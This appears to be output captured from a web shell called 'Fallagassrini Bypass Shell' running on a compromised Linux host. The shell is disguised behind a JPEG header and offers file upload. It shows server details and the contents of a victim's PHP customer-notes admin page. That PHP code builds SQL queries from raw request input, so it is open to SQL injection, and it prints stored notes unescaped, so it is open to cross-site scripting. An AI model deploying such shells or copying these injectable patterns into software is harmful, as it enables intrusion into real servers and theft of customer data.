JFIF;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 85 C  !"$"$C$^" }!1AQa"q2#BR$3br %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz w!1AQaq"2B #3Rbr $4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz ? C^",k8`98?þ. s$ֱ$Xw_Z¿2b978%Q}s\ŴqXxzK1\@N2<JY{lF/Z=N[xrB}FJۨ<yǽw 5o۹^s(!fF*zn5`Z}Ҋ">Ir{_+<$$C_UC)^r25d:(c⣕U .fpSnFe\Ӱ.չ8# m=8iO^)R=^*_:M3x8k>(yDNYҵ/v-]WZ}h[*'ym&e`Xg>%̲yk߆՞Kwwrd󞼎 r;M<[AC¤ozʪ+h%BJcd`*ǎVz%6}G;mcՊ~b_aaiiE4jPLU<Ɗvg?q~!vc DpA/m|=-nux^Hޔ|mt&^ 唉KH?񯣾 ^]G\4#r qRRGV!i~眦]Ay6O#gm&;UV BH ~Y8( J4{U| 14%v0?6#{t񦊊#+{E8v??c9R]^Q,h#i[Y'Š+xY佑VR{ec1%|]p=Vԡʺ9rOZY L(^*;O'ƑYxQdݵq~5_uk{yH$HZ(3 )~G Fallagassrini

Fallagassrini Bypass Shell

echo"
Fallagassrini
";
Current Path : /home/tarinient/public_html/admin/

Linux venus.ewebguru.net 4.18.0-553.44.1.el8_10.x86_64 #1 SMP Mon Mar 10 05:10:11 EDT 2025 x86_64
Upload File :
Current File : /home/tarinient/public_html/admin/src_customer_notes.php

<?php
session_start();
include('../configuration.php');
include("includes/php_devfunction.php");

check_userlogin();

$page = $_REQUEST['page'];
if($page) 
	$start = ($page - 1) * $limit; 			//first item to display on this page
else
	$start = 0;	

$fromdt=$_REQUEST["fromdt"];
$todt=$_REQUEST["todt"];
$srcval=$_REQUEST["srcval"];

$targetpage = "'".$fromdt."','".$todt."','".$srcval."',";

//====== Retrieve login user details ===============
$sqlsrc=" select * from tbl_note_details where cust_id !='' ";

if(!empty($srcval))
{	 
	$sqlsrc.= " and note_details like '%".$srcval."%' ";
}

if($fromdt!="" && $todt=="")
{
	$sqlsrc.= " and added_date >='".date("Y-m-d",strtotime($fromdt))."' ";
}

if($todt!="" && $fromdt=="")
{
	$sqlsrc.= " and added_date <='".$todt."' ";
}

if($fromdt!="" && $todt!="")
{
	$sqlsrc.= " and office_city ='".$cityname."' ";
}


$sqlsrc .= " and addedby='".$_SESSION['uniqID']."' order by added_date desc";

$sqlsrc .= " LIMIT $start,$limit";

$row_src = $db->Execute($sqlsrc);
$total_src  = $row_src->RecordCount();

//************************* Total record as per condition ********************************************
$sqltot=" select * from tbl_note_details where cust_id !='' ";

if(!empty($srcval))
{	 
	$sqltot.= " and note_details like '%".$srcval."%' ";
}

if($fromdt!="" && $todt=="")
{
	$sqltot.= " and added_date >='".date("Y-m-d",strtotime($fromdt))."' ";
}

if($todt!="" && $fromdt=="")
{
	$sqltot.= " and added_date <='".$todt."' ";
}

if($fromdt!="" && $todt!="")
{
	$sqltot.= " and office_city ='".$cityname."' ";
}


$sqltot .= " and addedby='".$_SESSION['uniqID']."' order by added_date desc";

$rowrec = $db->Execute($sqltot);
$total  = $rowrec->RecordCount();
//======= How many number of page =========	

$pagination=showpagination($targetpage,$total,$page);

?>
<table width="100%" cellpadding="5" cellspacing="0" border="1" style="border:1px solid #999; border-collapse:collapse; font-size:12px;">
<tr bgcolor="#999999">
	<th width="10%" align="center">Date</th>
    <th height="25" width="10%" align="center">Account No.</th>
    <th width="20%" align="left">Name</th>    
    <th width="60%">Notes</th>
</tr>
<?php
if($total_src>0){
$bgcol='bgcolor="#FFFFFF"';
while (!$row_src->EOF) {


?>
<tr <?php echo $bgcol;?>>
	<td align="center"><?php echo date("d-m-Y",strtotime($row_src->fields["added_date"]));?></td>
    <td align="center">
    <a href="javascript:void(0);" onClick="viewemployee('<?php echo $row_src->fields["cust_id"];?>');"><?php echo show_accountno($row_src->fields["cust_id"]);?></a>
    </td>
    <td align="left"><?php echo show_name($row_src->fields["cust_id"]);?></td>    
    <td><?php echo $row_src->fields["note_details"];?></td>
    
</tr>
<?php

if($bgcol=='bgcolor="#FFFFFF"') { $bgcol='bgcolor="#EFEFEF"';} else { $bgcol='bgcolor="#FFFFFF"';}

$row_src->MoveNext();
}
?>
<tr>
<td colspan="4" align="center"><?php echo $pagination; ?></td>
</tr>
<?php
}
else
{
?>
<tr>
<td colspan="4" align="center" height="25"><b>No Note Details found.</b></td>
</tr>
<?php }?>
<!--<tr bgcolor="#EFEFEF">
    <td>Trident</td>
    <td>Internet
         Explorer 5.0</td>
    <td>Win 95+</td>
    <td class="center">5</td>
    <td class="center">C</td>
    <td class="center"> 4</td>
    <td class="center"><a href="#">+Note</a>&nbsp;&nbsp;<a href="#">+Device</a>&nbsp;&nbsp;
    <a href="#">+Ticket</a></td>
</tr>-->
</table>

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net